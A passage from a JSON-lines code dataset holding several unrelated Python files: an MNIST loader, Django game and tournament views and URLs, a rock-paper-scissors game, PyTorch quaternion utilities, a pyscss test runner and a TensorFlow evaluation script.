self.ftest_features,\n self.ftest_labels,\n ]:\n print(path)\n assert os.path.exists(path), \"File error: \" + path + \" does not exist\"\n\n def load(self):\n X_train = self.load_features(self.ftrain_feature)\n X_test = self.load_features(self.ftest_features)\n y_train = self.load_labels(self.ftrain_labels)\n y_test = 
self.load_labels(self.ftest_labels)\n\n # one-hot encoding\n y_train = self.one_hot_encoding(y_train)\n y_test = self.one_hot_encoding(y_test)\n\n # normalize\n X_train = X_train / 255.0\n X_test = X_test / 255.0\n\n return X_train, X_test, y_train, y_test\n\n def load_features(self, file_path):\n \"\"\"Load images as 1D array\"\"\"\n with gzip.open(file_path, \"rb\") as f:\n features = np.frombuffer(f.read(), dtype=np.uint8, offset=16)\n return features.reshape(-1, 28 * 28)\n\n def load_labels(self, file_path):\n \"\"\"Load labels as 1D array\"\"\"\n with gzip.open(file_path, \"rb\") as f:\n labels = np.frombuffer(f.read(), dtype=np.uint8, offset=8)\n return labels\n\n def one_hot_encoding(self, y):\n \"\"\"Convert binary labels into one-hot encoding\"\"\"\n y = y.reshape(1, -1)\n y = y.transpose()\n encoder = OneHotEncoder()\n return encoder.fit_transform(y).toarray()\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"406018824","text":"from django.conf.urls import patterns, url\nfrom django.contrib.auth.views import logout as logout_view\nfrom battleshipapp import views\n\nurlpatterns = patterns('',\n\n\turl(r'^$', views.index, name='index' ),\n\turl(r'^/$', views.index, name='index' ),\n url(r'^login/$', views.user_login, name='login'),\n url(r'^logout/$', logout_view, {'next_page': '/' }),\n \n\n url(r'games/$', views.BattleshipGameList.as_view() ),\n url(r'games/(?P[0-9]+)$', views.BattleshipGame.as_view() ),\n\n url(r'player$', views.PlayerView.as_view() ),\n)","sub_path":"battleshipapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"369843988","text":"import random\r\n\r\ndef validate(hand):\r\n if hand < 0 or hand > 2:\r\n return False\r\n else:\r\n return True\r\n\r\ndef 
handshape(hand, name):\r\n hands = ['Rock', 'Paper', 'Scissors']\r\n print(name + ' picked: ' + hands[hand])\r\n\r\ndef battle(player, computer):\r\n if player == computer:\r\n return 'Draw'\r\n elif player == 0 and computer == 1:\r\n return 'You Lose...'\r\n elif player == 1 and computer == 2:\r\n return 'You Lose...'\r\n elif player == 2 and computer == 0:\r\n return 'You Lose...'\r\n else:\r\n return 'You Win!!'\r\n\r\ndef main():\r\n print(\r\n \"\"\"\r\n \\n \\U0000270A \\U0001F590 \\U0000270C ====== WELCOME TO JANKENPON GAME ====== \\U0000270C \\U0001F590 \\U0000270A\r\n \"\"\")\r\n player_name = input('Please enter your name: ')\r\n\r\n print('\\nPick a hand: (0: Rock, 1: Paper, 2: Scissors)')\r\n\r\n player_handshape = None\r\n while True:\r\n try:\r\n player_handshape = int(input('Please enter a number (0-2): '))\r\n except ValueError:\r\n print('Please input valid number')\r\n continue\r\n else:\r\n break\r\n\r\n if validate(player_handshape):\r\n computer_handshape = random.randint(0, 2)\r\n print('\\n')\r\n handshape(player_handshape, player_name)\r\n handshape(computer_handshape, 'Computer')\r\n result = battle(player_handshape, computer_handshape)\r\n print('\\nResult: ' + result)\r\n\r\n else:\r\n while True:\r\n print(\"Please input valid number\")\r\n while True:\r\n try:\r\n player_handshape = int(input('Please enter a number (0-2): '))\r\n except ValueError:\r\n print('Please input valid number')\r\n continue\r\n else:\r\n break\r\n if validate(player_handshape):\r\n computer_handshape = random.randint(0, 2)\r\n print('\\n')\r\n handshape(player_handshape, player_name)\r\n handshape(computer_handshape, 'Computer')\r\n result = battle(player_handshape, computer_handshape)\r\n print('\\nResult: ' + result)\r\n break\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\nwhile True:\r\n while True:\r\n again = str(input('Play again? 
(y/n): '))\r\n if again in ('y', 'n'):\r\n break\r\n print('Invalid input')\r\n if again == 'y':\r\n main()\r\n else:\r\n print('\\nThank you for playing JANKENPON game!')\r\n print('See you later!')\r\n break\r\n","sub_path":"jankenpon.py","file_name":"jankenpon.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"77485357","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 26 13:31:58 2019\n\n\"\"\"\n\n# Copyright (c) 2018-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the license found in the\n# LICENSE file in the root directory of this source tree.\n#\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom numpy.random import RandomState\nfrom scipy.stats import chi\n#import sys\n#from quat_ops import *\n#import torch_autograd_solver as S\n#import quat_ops\n#from torch_batch_svd import batch_svd\n\n# PyTorch-backed implementations\n\ndef qmul(q, r):\n \"\"\"\n Multiply quaternion(s) q with quaternion(s) r.\n Expects two equally-sized tensors of shape (*, 4), where * denotes any number of dimensions.\n Returns q*r as a tensor of shape (*, 4).\n \"\"\"\n assert q.shape[-1] == 4\n assert r.shape[-1] == 4\n\n original_shape = q.shape\n\n # Compute outer product\n terms = torch.bmm(r.contiguous().view(-1, 4, 1), q.contiguous().view(-1, 1, 4))\n\n w = terms[:, 0, 0] - terms[:, 1, 1] - terms[:, 2, 2] - terms[:, 3, 3]\n x = terms[:, 0, 1] + terms[:, 1, 0] - terms[:, 2, 3] + terms[:, 3, 2]\n y = terms[:, 0, 2] + terms[:, 1, 3] + terms[:, 2, 0] - terms[:, 3, 1]\n z = terms[:, 0, 3] - terms[:, 1, 2] + terms[:, 2, 1] + terms[:, 3, 0]\n return torch.stack((w, x, y, z), dim=1).view(original_shape)\n\ndef qrotv(q, v):\n \"\"\"\n Rotate vector(s) v about the rotation described by quaternion(s) q.\n Expects a tensor of shape (*, 
4) for q and a tensor of shape (*, 3) for v,\n where * denotes any number of dimensions.\n Returns a tensor of shape (*, 3).\n \"\"\"\n assert q.shape[-1] == 4\n assert v.shape[-1] == 3\n assert q.shape[:-1] == v.shape[:-1]\n\n original_shape = list(v.shape)\n q = q.view(-1, 4)\n v = v.view(-1, 3)\n\n qvec = q[:, 1:]\n uv = torch.cross(qvec, v, dim=1)\n uuv = torch.cross(qvec, uv, dim=1)\n return (v + 2 * (q[:, :1] * uv + uuv)).view(original_shape)\n\n\ndef qrotv3(q, v):\n \"\"\"\n Rotate vector(s) v about the rotation described by quaternion(s) q.\n Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 3) for v,\n where * denotes any number of dimensions.\n Returns a tensor of shape (*, 3).\n \"\"\"\n assert q.shape[-1] == 4\n assert v.shape[-1] == 3\n assert q.shape[:-1] == v.shape[:-1]\n\n original_shape = list(v.shape)\n q = q.view(-1, 4)\n v = v.view(-1, 3)\n\n # Compute outer product\n terms = torch.bmm(q.view(-1, 4, 1), q.view(-1, 1, 4))\n b2=terms[:,1,1]\n c2=terms[:,2,2]\n d2=terms[:,3,3]\n ab=terms[:,0,1]\n ac=terms[:,0,2]\n ad=terms[:,0,3]\n bc=terms[:,1,2]\n bd=terms[:,1,3]\n cd=terms[:,2,3]\n\n\n qvec_x=[1-2*c2-2*d2, 2*bc-2*ad, 2*ac+2*bd]\n qvec_y=[2*bc+2*ad, 1-2*b2-2*d2, 2*cd-2*ab]\n qvec_z=[2*bd-2*ac, 2*ab+2*cd, 1-2*b2-2*c2]\n qvec=torch.stack((torch.stack(qvec_x, dim=1), torch.stack(qvec_y, dim=1), torch.stack(qvec_z, dim=1)), dim=1)\n\n return torch.bmm(qvec,v.unsqueeze(-1)).view(original_shape)\n\n\n\ndef qrotq(q, p):\n \"\"\"\n Rotate quaternion(s) p about the rotation described by quaternion(s) q.\n Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 4) for p,\n where * denotes any number of dimensions.\n Returns a tensor of shape (*, 4).\n \"\"\"\n# assert q.shape[-1] == 4\n# assert p.shape[-1] == 4\n# assert q.shape[:-1] == p.shape[:-1]\n\n original_shape = list(p.shape)\n q = q.view(-1, 4)\n p = p.view(-1, 4)\n pw=p[:,0]\n pv=p[:,1:4]\n\n qvec = q[:, 1:]\n uv = torch.cross(qvec, pv, dim=1)\n uuv = torch.cross(qvec, uv, 
dim=1)\n\n pv=(pv + 2 * (q[:, :1] * uv + uuv))\n\n# return (pv + 2 * (q[:, :1] * uv + uuv)).view(original_shape)\n return torch.cat((pw.unsqueeze(-1), pv), dim=1).view(original_shape)\n\ndef qrotq3(q, p):\n \"\"\"\n Rotate quaternion(s) p about the rotation described by quaternion(s) q.\n Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 4) for p,\n where * denotes any number of dimensions.\n Returns a tensor of shape (*, 4).\n \"\"\"\n assert q.shape[-1] == 4\n assert p.shape[-1] == 4\n assert q.shape[:-1] == p.shape[:-1]\n\n original_shape = list(p.shape)\n q = q.view(-1, 4)\n p = p.view(-1, 4)\n pw=p[:,0]\n pv=p[:,1:4]\n\n # Compute outer product\n terms = torch.bmm(q.view(-1, 4, 1), q.view(-1, 1, 4))\n b2=terms[:,1,1]\n c2=terms[:,2,2]\n d2=terms[:,3,3]\n ab=terms[:,0,1]\n ac=terms[:,0,2]\n ad=terms[:,0,3]\n bc=terms[:,1,2]\n bd=terms[:,1,3]\n cd=terms[:,2,3]\n\n\n qvec_x=[ 1-2*c2-2*d2, 2*bc-2*ad, 2*ac+2*bd]\n qvec_y=[ 2*bc+2*ad, 1-2*b2-2*d2, 2*cd-2*ab]\n qvec_z=[ 2*bd-2*ac, 2*ab+2*cd, 1-2*b2-2*c2]\n qvec=torch.stack((torch.stack(qvec_x, dim=1), torch.stack(qvec_y, dim=1), torch.stack(qvec_z, dim=1)), dim=1)\n\n pv=torch.bmm(qvec, pv.unsqueeze(-1)).squeeze()\n\n return torch.cat((pw.unsqueeze(-1), pv), dim=1).view(original_shape)\n\ndef qeuler(q, order, epsilon=0):\n \"\"\"\n Convert quaternion(s) q to Euler angles.\n Expects a tensor of shape (*, 4), where * denotes any number of dimensions.\n Returns a tensor of shape (*, 3).\n \"\"\"\n assert q.shape[-1] == 4\n\n original_shape = list(q.shape)\n original_shape[-1] = 3\n q = q.view(-1, 4)\n\n q0 = q[:, 0]\n q1 = q[:, 1]\n q2 = q[:, 2]\n q3 = q[:, 3]\n\n if order == 'xyz':\n x = torch.atan2(2 * (q0 * q1 - q2 * q3), 1 - 2*(q1 * q1 + q2 * q2))\n y = torch.asin(torch.clamp(2 * (q1 * q3 + q0 * q2), -1+epsilon, 1-epsilon))\n z = torch.atan2(2 * (q0 * q3 - q1 * q2), 1 - 2*(q2 * q2 + q3 * q3))\n elif order == 'yzx':\n x = torch.atan2(2 * (q0 * q1 - q2 * q3), 1 - 2*(q1 * q1 + q3 * q3))\n y = 
torch.atan2(2 * (q0 * q2 - q1 * q3), 1 - 2*(q2 * q2 + q3 * q3))\n z = torch.asin(torch.clamp(2 * (q1 * q2 + q0 * q3), -1+epsilon, 1-epsilon))\n elif order == 'zxy':\n x = torch.asin(torch.clamp(2 * (q0 * q1 + q2 * q3), -1+epsilon, 1-epsilon))\n y = torch.atan2(2 * (q0 * q2 - q1 * q3), 1 - 2*(q1 * q1 + q2 * q2))\n z = torch.atan2(2 * (q0 * q3 - q1 * q2), 1 - 2*(q1 * q1 + q3 * q3))\n elif order == 'xzy':\n x = torch.atan2(2 * (q0 * q1 + q2 * q3), 1 - 2*(q1 * q1 + q3 * q3))\n y = torch.atan2(2 * (q0 * q2 + q1 * q3), 1 - 2*(q2 * q2 + q3 * q3))\n z = torch.asin(torch.clamp(2 * (q0 * q3 - q1 * q2), -1+epsilon, 1-epsilon))\n elif order == 'yxz':\n x = torch.asin(torch.clamp(2 * (q0 * q1 - q2 * q3), -1+epsilon, 1-epsilon))\n y = torch.atan2(2 * (q1 * q3 + q0 * q2), 1 - 2*(q1 * q1 + q2 * q2))\n z = torch.atan2(2 * (q1 * q2 + q0 * q3), 1 - 2*(q1 * q1 + q3 * q3))\n elif order == 'zyx':\n x = torch.atan2(2 * (q0 * q1 + q2 * q3), 1 - 2*(q1 * q1 + q2 * q2))\n y = torch.asin(torch.clamp(2 * (q0 * q2 - q1 * q3), -1+epsilon, 1-epsilon))\n z = torch.atan2(2 * (q0 * q3 + q1 * q2), 1 - 2*(q2 * q2 + q3 * q3))\n else:\n raise\n\n return torch.stack((x, y, z), dim=1).view(original_shape)\n\n\ndef unitary_init(in_features, out_features, rng, kernel_size=None, criterion='he'):\n\n if kernel_size is not None:\n receptive_field = np.prod(kernel_size)\n fan_in = in_features * receptive_field\n fan_out = out_features * receptive_field\n else:\n fan_in = in_features\n fan_out = out_features\n\n if criterion == 'glorot':\n s = 1. / np.sqrt(2*(fan_in + fan_out))\n elif criterion == 'he':\n s = 1. 
/ np.sqrt(2*fan_in)\n else:\n raise ValueError('Invalid criterion: ' + criterion)\n\n if kernel_size is None:\n kernel_shape = (in_features, out_features)\n else:\n if type(kernel_size) is int:\n kernel_shape = (out_features, in_features) + tuple((kernel_size,))\n else:\n kernel_shape = (out_features, in_features) + (*kernel_size,)\n\n s = np.sqrt(3.0) * s\n\n number_of_weights = np.prod(kernel_shape)\n v_r = np.random.uniform(-s,s,number_of_weights)\n v_i = np.random.uniform(-s,s,number_of_weights)\n v_j = np.random.uniform(-s,s,number_of_weights)\n v_k = np.random.uniform(-s,s,number_of_weights)\n\n\n\n # Unitary quaternion\n for i in range(0, number_of_weights):\n norm = np.sqrt(v_r[i]**2 + v_i[i]**2 + v_j[i]**2 + v_k[i]**2)+0.0001\n v_r[i]/= norm\n v_i[i]/= norm\n v_j[i]/= norm\n v_k[i]/= norm\n\n v_r = v_r.reshape(kernel_shape)\n v_i = v_i.reshape(kernel_shape)\n v_j = v_j.reshape(kernel_shape)\n v_k = v_k.reshape(kernel_shape)\n\n return (v_r, v_i, v_j, v_k)\n\ndef random_init(in_features, out_features, rng, kernel_size=None, criterion='glorot'):\n\n if kernel_size is not None:\n receptive_field = np.prod(kernel_size)\n fan_in = in_features * receptive_field\n fan_out = out_features * receptive_field\n else:\n fan_in = in_features\n fan_out = out_features\n\n if criterion == 'glorot':\n s = 1. / np.sqrt(2*(fan_in + fan_out))\n elif criterion == 'he':\n s = 1. 
/ np.sqrt(2*fan_in)\n else:\n raise ValueError('Invalid criterion: ' + criterion)\n\n if kernel_size is None:\n kernel_shape = (in_features, out_features)\n else:\n if type(kernel_size) is int:\n kernel_shape = (out_features, in_features) + tuple((kernel_size,))\n else:\n kernel_shape = (out_features, in_features) + (*kernel_size,)\n\n number_of_weights = np.prod(kernel_shape)\n v_r = np.random.uniform(0.0,1.0,number_of_weights)\n v_i = np.random.uniform(0.0,1.0,number_of_weights)\n v_j = np.random.uniform(0.0,1.0,number_of_weights)\n v_k = np.random.uniform(0.0,1.0,number_of_weights)\n\n v_r = v_r.reshape(kernel_shape)\n v_i = v_i.reshape(kernel_shape)\n v_j = v_j.reshape(kernel_shape)\n v_k = v_k.reshape(kernel_shape)\n\n weight_r = v_r * s\n weight_i = v_i * s\n weight_j = v_j * s\n weight_k = v_k * s\n return (weight_r, weight_i, weight_j, weight_k)\n\n\ndef quaternion_init(in_features, out_features, rng, kernel_size=None, criterion='glorot'):\n\n if kernel_size is not None:\n receptive_field = np.prod(kernel_size)\n fan_in = in_features * receptive_field\n fan_out = out_features * receptive_field\n else:\n fan_in = in_features\n fan_out = out_features\n\n if criterion == 'glorot':\n s = 1. / np.sqrt(2*(fan_in + fan_out))\n elif criterion == 'he':\n s = 1. 
/ np.sqrt(2*fan_in)\n else:\n raise ValueError('Invalid criterion: ' + criterion)\n\n rng = RandomState(np.random.randint(1,1234))\n\n\n # Generating randoms and purely imaginary quaternions :\n if kernel_size is None:\n kernel_shape = (in_features, out_features)\n else:\n if type(kernel_size) is int:\n kernel_shape = (out_features, in_features) + tuple((kernel_size,))\n else:\n kernel_shape = (out_features, in_features) + (*kernel_size,)\n\n modulus = chi.rvs(4,loc=0,scale=s,size=kernel_shape)\n\n# modulus= rng.uniform(size=kernel_shape)\n number_of_weights = np.prod(kernel_shape)\n\n\n v_i = np.random.normal(0,1.0,number_of_weights)\n v_j = np.random.normal(0,1.0,number_of_weights)\n v_k = np.random.normal(0,1.0,number_of_weights)\n\n # Purely imaginary quaternions unitary\n for i in range(0, number_of_weights):\n \tnorm = np.sqrt(v_i[i]**2 + v_j[i]**2 + v_k[i]**2 +0.0001)\n \tv_i[i]/= norm\n \tv_j[i]/= norm\n \tv_k[i]/= norm\n v_i = v_i.reshape(kernel_shape)\n v_j = v_j.reshape(kernel_shape)\n v_k = v_k.reshape(kernel_shape)\n\n phase = rng.uniform(low=-np.pi, high=np.pi, size=kernel_shape)\n\n weight_r = modulus * np.cos(phase)\n weight_i = modulus * v_i*np.sin(phase)\n weight_j = modulus * v_j*np.sin(phase)\n weight_k = modulus * v_k*np.sin(phase)\n\n return (weight_r, weight_i, weight_j, weight_k)\n\ndef create_dropout_mask(dropout_p, size, rng, as_type, operation='linear'):\n if operation == 'linear':\n mask = rng.binomial(n=1, p=1-dropout_p, size=size)\n return Variable(torch.from_numpy(mask).type(as_type))\n else:\n raise Exception(\"create_dropout_mask accepts only 'linear'. Found operation = \"\n + str(operation))\n\ndef affect_init(q_weight, init_func, rng, init_criterion):\n# if r_weight.size() != i_weight.size() or r_weight.size() != j_weight.size() or \\\n# r_weight.size() != k_weight.size() :\n# raise ValueError('The real and imaginary weights '\n# 'should have the same size . 
Found: r:'\n# + str(r_weight.size()) +' i:'\n# + str(i_weight.size()) +' j:'\n# + str(j_weight.size()) +' k:'\n# + str(k_weight.size()))\n#\n# elif r_weight.dim() != 2:\n# raise Exception('affect_init accepts only matrices. Found dimension = '\n# + str(r_weight.dim()))\n kernel_size = None\n r, i, j, k = init_func(q_weight.size(0), q_weight.size(1), rng, kernel_size, init_criterion)\n r, i, j, k = torch.from_numpy(r), torch.from_numpy(i), torch.from_numpy(j), torch.from_numpy(k)\n q_weight.data= torch.stack((r.type_as(q_weight.data),i.type_as(q_weight.data),j.type_as(q_weight.data),k.type_as(q_weight.data)),2)\n\n# r_weight.data = r.type_as(r_weight.data)\n# i_weight.data = i.type_as(i_weight.data)\n# j_weight.data = j.type_as(j_weight.data)\n# k_weight.data = k.type_as(k_weight.data)\n\n\n\n\nif __name__ == '__main__':\n p=torch.rand(16,64,4)\n pool_grid=torch.FloatTensor([[-1.0, -1.0, -1.0], [1.0, -1.0, -1.0],\n [-1.0, 1.0, -1.0], [1.0, 1.0, -1.0],\n [-1.0, -1.0, 1.0], [1.0, -1.0, 1.0],\n [-1.0, 1.0, 1.0], [1.0, 1.0, 1.0]])\n#\n p=p.unsqueeze(-2)\n p=p.expand(p.size(0), p.size(1),8, p.size(3)).contiguous()\n pool_grid=pool_grid.view(1,1,8,3)\n pool_grid=pool_grid.expand(p.size(0), p.size(1),8, 3).contiguous()\n\n# p=p.cuda()\n# pool_grid=pool_grid.cuda()\n test1=qrotv(p, pool_grid)\n\n\n test3=qrotv3(p, pool_grid)\n print(test1[0,0,])\n print(test3[0,0,])\n\n input_lrf=torch.rand(16,64,8,4)\n t_ij=torch.rand(16,64,8,32,4)\n input_lrf=input_lrf.unsqueeze(-2)\n input_lrf=input_lrf.expand(t_ij.size(0), t_ij.size(1), t_ij.size(2), 32, t_ij.size(4)).contiguous()\n test2=qrotq(t_ij, input_lrf)\n test4=qrotq3(t_ij, input_lrf)\n","sub_path":"models/quat_ops.py","file_name":"quat_ops.py","file_ext":"py","file_size_in_byte":14430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"84441185","text":"\"\"\"Evaluates all the tests that live in `scss/tests/files`.\n\nA test is any file with a `.scss` extension. 
It'll be compiled, and the output\nwill be compared to the contents of a file named `foo.css`.\n\nCurrently, test files must be nested exactly one directory below `files/`.\nThis limitation is completely arbitrary. Files starting with '_' are skipped.\n\n\"\"\"\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport os\nimport logging\nimport sys\nfrom importlib import import_module\n\nimport six\n\nimport scss\n\n\nif six.PY2:\n from io import open\n\n\nconsole = logging.StreamHandler()\nlogger = logging.getLogger('scss')\nlogger.setLevel(logging.ERROR)\nlogger.addHandler(console)\n\n\ndef test_pair_programmatic(scss_file_pair):\n scss_fn, css_fn = scss_file_pair\n\n # look for a python module related to the pair and execute it if found\n mod = None\n cfg_script = scss_fn.replace('.scss', '.py')\n if os.path.exists(cfg_script):\n sys.path[0:0] = [os.path.dirname(scss_fn)]\n mod = import_module(os.path.splitext(os.path.split(scss_fn)[1])[0])\n getattr(mod, 'setUp', lambda: None)()\n sys.path = sys.path[1:]\n\n with open(scss_fn) as fh:\n source = fh.read()\n with open(css_fn, 'r', encoding='utf8') as fh:\n expected = fh.read()\n\n directory, _ = os.path.split(scss_fn)\n include_dir = os.path.join(directory, 'include')\n scss.config.STATIC_ROOT = os.path.join(directory, 'static')\n\n try:\n compiler = scss.Scss(scss_opts=dict(style='expanded'), search_paths=[include_dir, directory])\n actual = compiler.compile(source)\n\n getattr(mod, 'tearDown', lambda:None)()\n\n # Normalize leading and trailing newlines\n actual = actual.strip('\\n')\n expected = expected.strip('\\n')\n\n assert expected == actual\n\n finally:\n # cleanup generated assets if any\n assets_dir = os.path.join(directory, 'static', 'assets')\n if os.path.isdir(assets_dir):\n for x in os.listdir(assets_dir):\n if x != '.placeholder':\n os.remove(os.path.join(assets_dir, x))\n\ndef test_rel_import():\n\n scss_vars = {}\n _scss = scss.Scss(scss_vars=scss_vars)\n\n actual = 
_scss.compile(scss_file=os.path.join(os.path.dirname(__file__),\n 'files', 'general',\n 'relative-import.fscss'))\n\n expected = open(os.path.join(os.path.dirname(__file__), 'files',\n 'general', 'relative-import.css')).read()\n\n assert expected == actual\n","sub_path":"scss/tests/test_files.py","file_name":"test_files.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"502515817","text":"import tensorflow as tf\r\nimport time\r\nimport model_helper as helper\r\nfrom utils import misc_util as misc\r\nimport os\r\n\r\n\r\ntf.logging.set_verbosity(tf.logging.INFO)\r\n\r\n\r\ndef get_model_creator(model_type):\r\n # from models.vgg16 import VGG16\r\n from models.inception_v3 import InceptionV3\r\n from models.vgg_16 import VGG16B\r\n from models.resnet_v1 import ResNetV1\r\n if model_type == \"VGG_16\":\r\n return VGG16B\r\n elif model_type == \"InceptionV3\":\r\n return InceptionV3\r\n elif model_type == \"ResNetV1\":\r\n return ResNetV1\r\n\r\n\r\ndef evaluate(hparams, scope=None, target_session=\"\", ckpt_path=None,\r\n summary_writer=None, global_step_=0, alternative=False):\r\n if alternative:\r\n out_dir = os.path.join(hparams.base_dir, \"train\")\r\n else:\r\n out_dir = os.path.join(hparams.base_dir, \"eval\")\r\n ckpt_path = os.path.join(hparams.base_dir, \"ckpt\")\r\n if not misc.check_file_existence(out_dir):\r\n tf.gfile.MakeDirs(out_dir)\r\n tf.logging.info(\"All eval relevant results will be put in %s\" % out_dir)\r\n\r\n # Create model\r\n model_creator = get_model_creator(hparams.model_type)\r\n eval_model = helper.create_eval_model(model_creator,\r\n hparams, scope)\r\n config_proto = misc.get_config_proto(\r\n log_device_placement=hparams.log_device_placement,\r\n num_intra_threads=hparams.num_intra_threads,\r\n num_inter_threads=hparams.num_inter_threads)\r\n eval_sess = tf.Session(\r\n target=target_session, config=config_proto,\r\n 
graph=eval_model.graph)\r\n tf.logging.info(\"Create model successfully\")\r\n with eval_model.graph.as_default():\r\n loaded_eval_model, global_step = helper.create_or_load_model(\r\n eval_model.model,\r\n ckpt_path,\r\n eval_sess)\r\n if global_step > 0:\r\n if global_step_ > 0:\r\n assert global_step_ == global_step\r\n tf.logging.info(\"Loading model from global step %d to evaluate\" % global_step)\r\n else:\r\n tf.logging.info(\"With global step is 0, can not execute evaluation\")\r\n return\r\n # Summary writer\r\n if summary_writer is None:\r\n summary_name = \"eval_summary\"\r\n summary_path = os.path.join(out_dir, summary_name)\r\n if not tf.gfile.Exists(summary_path):\r\n tf.gfile.MakeDirs(summary_path)\r\n summary_writer = tf.summary.FileWriter(\r\n os.path.join(out_dir, summary_name), eval_model.graph)\r\n eval_sess.run(eval_model.data_wrapper.initializer)\r\n tf.logging.info(\"Ready to eval\")\r\n step = 0\r\n accuracies = 0.\r\n while True:\r\n start_time = time.time()\r\n try:\r\n tf.logging.info(\"Start eval step:%d\" % step)\r\n results = loaded_eval_model.eval(eval_sess)\r\n summary_writer.add_summary(results.summary, global_step)\r\n tf.logging.info(\"Evaluation step %d, accuracy is %f, %s\"\r\n % (step, results.accuracy, time.ctime()))\r\n accuracies += results.accuracy\r\n step += 1\r\n except tf.errors.OutOfRangeError:\r\n avg_accuracy = accuracies / step\r\n tf.logging.info(\"After %d steps of evaluation, accuracy is %f \"\r\n % (step, avg_accuracy, time.time()-start_time))\r\n tf.logging.info(\"Finish evaluating\")\r\n summary_writer.close()\r\n break\r\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"321943727","text":"from django.shortcuts import get_object_or_404\nfrom django.views.generic import CreateView, UpdateView, ListView,\\\n DeleteView, View\nfrom django.http import HttpResponseRedirect, 
JsonResponse\nfrom django.core.exceptions import PermissionDenied\nimport random\n# Create your views here.\n\nfrom apps.tournament.models import Tournament, Team, Round, Match\nfrom apps.tournament.forms import RoundCreateForm, TournCreateForm\n\n\nclass StaffOnly(object):\n\n def dispatch(self, request, *args, **kwargs):\n if not request.user.is_staff:\n raise PermissionDenied\n return super(StaffOnly, self).dispatch(request, *args, **kwargs)\n\n\nclass CreateTournamentView(StaffOnly, CreateView):\n\n model = Tournament\n template_name = 'tourn_create.html'\n success_url = '/tournament/admin/'\n form_class = TournCreateForm\n\n def form_valid(self, form):\n self.object = form.save()\n if form.cleaned_data['generate_team']:\n pairs = generate_player_pair(self.object.tour_players.all())\n for pair in pairs:\n team = Team.objects.create(tournament=self.object)\n for i in pair:\n team.team_players.add(i)\n team.generate_name()\n team.save()\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass ListTournamentView(ListView):\n\n model = Tournament\n template_name = 'tourn_list.html'\n context_object_name = 'tournaments'\n\n\nclass DeleteTournamentView(StaffOnly, DeleteView):\n\n model = Tournament\n success_url = '/tournament/admin/'\n\n\nclass EditTournamentView(StaffOnly, UpdateView):\n\n model = Tournament\n template_name = 'tourn_edit.html'\n fields = ('name',)\n success_url = '/tournament/admin/'\n\n def get_context_data(self, **kwargs):\n context = super(EditTournamentView, self).get_context_data(**kwargs)\n context['teams'] = self.get_object().team_set\n context['rounds'] = self.get_object().round_set\n return context\n\n\nclass CreateRoundView(StaffOnly, CreateView):\n\n model = Round\n template_name = 'round_create.html'\n form_class = RoundCreateForm\n\n def get_success_url(self):\n return '/tournament/edit/%s/' % (self.tourn.pk)\n\n def dispatch(self, *args, **kwargs):\n self.tourn = get_object_or_404(Tournament, pk=kwargs['tourn'])\n return 
super(CreateRoundView, self).dispatch(*args, **kwargs)\n\n def get_form(self, form_class):\n form = super(CreateRoundView, self).get_form(form_class)\n form.fields['round_team'].queryset = self.tourn.team_set.all()\n return form\n\n def form_valid(self, form):\n self.object = form.save(commit=False)\n self.object.tournament = self.tourn\n self.object.save()\n for team in form.cleaned_data['round_team']:\n self.object.round_team.add(team)\n self.object.save()\n if self.object.round_type == 'reg':\n pairs = generate_matches_pairs(self.object.round_team.all())\n else:\n pairs = generate_play_off_pairs(self.object.round_team.all())\n for i in range(form.cleaned_data['match_count']):\n for pair in pairs:\n Match.objects.create(team1=pair[0], team2=pair[1],\n match_round=self.object,\n tournament=self.tourn)\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass RoundListView(ListView):\n\n model = Round\n template_name = 'round_list.html'\n context_object_name = 'rounds'\n\n def get_queryset(self):\n self.tourn = get_object_or_404(Tournament, pk=self.kwargs['tourn'])\n return Round.objects.filter(tournament=self.tourn)\n\n\nclass MatchesListView(ListView):\n model = Match\n template_name = 'matches_list.html'\n context_object_name = 'matches'\n\n def get_queryset(self):\n self.round = get_object_or_404(Round, pk=self.kwargs['round'])\n return Match.objects.filter(match_round=self.round)\n\n def get_context_data(self, **kwargs):\n context = super(MatchesListView, self).get_context_data(**kwargs)\n context['round'] = self.round\n return context\n\n\nclass MatchesAdminEditView(StaffOnly, MatchesListView):\n\n template_name = 'matches_admin.html'\n\n\nclass AdminTournamentView(StaffOnly, ListView):\n\n model = Tournament\n template_name = 'admin_main.html'\n context_object_name = 'tournaments'\n\n\nclass GetMatchView(View):\n\n def get(self, request):\n match_pk = request.GET.get('pk')\n match = Match.objects.get(pk=match_pk)\n res = {}\n res['name_1'] = 
